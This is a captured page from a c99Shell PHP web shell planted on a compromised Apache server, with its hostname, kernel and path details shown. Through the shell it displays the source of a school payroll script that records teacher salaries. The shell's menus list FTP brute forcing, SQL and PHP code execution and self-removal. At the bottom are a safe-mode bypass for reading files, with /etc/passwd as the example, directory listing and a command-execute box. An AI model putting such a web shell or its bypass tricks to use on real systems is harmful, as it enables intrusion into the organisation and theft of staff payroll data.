110.164.51.230 - phpshell

!c99Shell v. 1.0 pre-release build #16!
Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 EDT 2010 i686 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/_manage_depart/ drwxr-xr-x Free 52.82 GB of 127.8 GB (41.33%) Encoder Tools Proc. FTP brute Sec. SQL PHP-code Update Feedback Self remove Logout


<?php



    session_start();

    

    /**  Define Validate Access  */

    define( '_VALID_ACCESS', 1 );



    /**  Check Session User Login  */

    if (! session_is_registered("valid_user") ) {

        echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />";

        echo "<p style=padding-top:115px><p align=center><br /><font color=red><strong>ЎГШіТ·УЎТГ Login ЎиН№</strong></font></p></p>";

        echo "<meta http-equiv=\"refresh\" content=\"1; URL=../login.php\" />";

        exit();

    } 

    else {

        /**  Configuration  */

        require_once( "../configuration.php" );

        require_once( $_Config_absolute_path . "/includes/framework.php" );

           require_once( "../include/FunctionDB.php" );

        /**  Create Database Object  */

        $dbObj = new DBConn;

        

        //###  ГСє¤иТЁТЎ Form



//$BuildD_Yr  = $_POST['mYear']."-".$_POST['mMonth']."-".$_POST['mDate'];

$Teacher_code = htmlspecialchars(trim($Teacher_code));

$Teacher_id = htmlspecialchars(trim($Teacher_id));

$Salary_1 = htmlspecialchars(trim($Salary_1));

$Salary_2 = htmlspecialchars(trim($Salary_2));

$Salary_3 = htmlspecialchars(trim($Salary_3));

$Costt_1 = htmlspecialchars(trim($Costt_1));

$Costt_2 = htmlspecialchars(trim($Costt_2));

$Costt_3 = htmlspecialchars(trim($Costt_3));

$Costt_4 = htmlspecialchars(trim($Costt_4));

$Costt_5 = htmlspecialchars(trim($Costt_5));

$Costt_6= htmlspecialchars(trim($Costt_6));

$Costt_7 = htmlspecialchars(trim($Costt_7));

$Costt_8 = htmlspecialchars(trim($Costt_8));

$Costt_9 = htmlspecialchars(trim($Costt_9));

$Costt_10 = htmlspecialchars(trim($Costt_10));

$Costt_11 = htmlspecialchars(trim($Costt_11));

$Costt_12 = htmlspecialchars(trim($Costt_12));

$Costt_13 = htmlspecialchars(trim($Costt_13));

$Costt_14 = htmlspecialchars(trim($Costt_14));

$Costt_15 = htmlspecialchars(trim($Costt_15)); 

$Costt_16 = htmlspecialchars(trim($Costt_16)); 

$Costt_17 = htmlspecialchars(trim($Costt_17)); 

$Costt_18 = htmlspecialchars(trim($Costt_18)); 

$Costt_19 = htmlspecialchars(trim($Costt_19)); 

$Start_mont = htmlspecialchars(trim($Start_mont));

$Start_year = htmlspecialchars(trim($Start_year));

   ///---------єЗЎґйТ№ГТВГСє--------------------///

$Costt_salary = $Costt_1+ $Costt_2 + $Costt_3 + $Costt_4 + $Costt_5 + $Costt_6 + $Costt_7 + $Costt_8 + $Costt_9  + $Costt10  + $Salary_1 + $Salary_2 + $Salary_3; 

    /////----------єЗЎґйТ№ГТВЁиТВ-------------////

$Costt_to =  $Costt_11 + $Costt_12 + $Costt_13 + $Costt_14 + $Costt_15 + $Costt_16 + $Costt_17  + $Costt_18 + $Costt_19 + $Costt_20 + $Costt_21 + $Costt_22 + $Costt_23 +               $Costt_24 + $Costt_25 ;

    $Costt_total = $Costt_salary  -  $Costt_to ;

    /**  Table  -->    */

        Insert_Salary_repot ($Teacher_code,$Teacher_id,$StatusId,$Faculty_code,$Person_type,$Start_mont,$Start_year,$Salary_1,$Salary_2,$Salary_3,$Costt_1,$Costt_2,$Costt_3,$Costt_4,$Costt_5, $Costt_6,$Costt_7,$Costt_8,$Costt_9,$Costt_10,$Costt_11,$Costt_12,$Costt_13,$Costt_14, $Costt_15, $Costt_16,$Costt_17,$Costt_18,$Costt_19,$Costt_20,$Costt_21,$Costt_22,$Costt_23,$Costt_24,$Costt_25,$Costt_salary,$Costt_to,$Costt_total,$Flag);

                

                /**  Close the Database  */

                    $dbObj->disconn();

                    /**  Unset Class  */

                unset($dbObj);

                echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />";

                echo "<script>alert('єС№·ЦЎўйНБЩЕаГХВєГйНВбЕйЗ');</script>";

                echo "<script>window.opener.document.all.myForm; window.opener.location.reload(); window.close();</script>";

                exit();

          

                      

        //InsertSalaryType($SalaryId,$Detail,$SalaryStatus,$Flag);



        /**  Close the Database  */

        //$dbObj->disconn();

        

        /**  Unset Class  */

        //unset($dbObj);

        

        /**  Output  */

        //if( $result1  ) {

            //echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=windows-874\" />";

            /*echo "<script>alert('єС№·ЦЎўйНБЩЕаГХВєГйНВбЕйЗ');</script>";

            echo "<script>window.opener.document.all.myForm; window.opener.location.reload(); window.close();</script>";

            //echo "<meta http-equiv='refresh' content='0; URL=DecorPersonalList.php'>";

            exit();

*/

        }

        

    //} # else

 ?>

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<meta http-equiv="Content-Type" content="text/html; charset=windows-874" />

<title>Edit Password</title>

<link href="../css/default.css" rel="stylesheet" type="text/css" />

</head>



<body topmargin="0" rightmargin="0" bottommargin="0" leftmargin="0">

</body>

</html>

:: Shadow's tricks :D ::
Useful Commands Warning. Kernel may be alerted using higher levels	Kernel Info:

:: Preddy's tricks :D ::
Php Safe-Mode Bypass (Read Files) File: eg: /etc/passwd	Php Safe-Mode Bypass (List Directories): Dir: eg: /etc/

:: Command execute ::
Enter:	Select: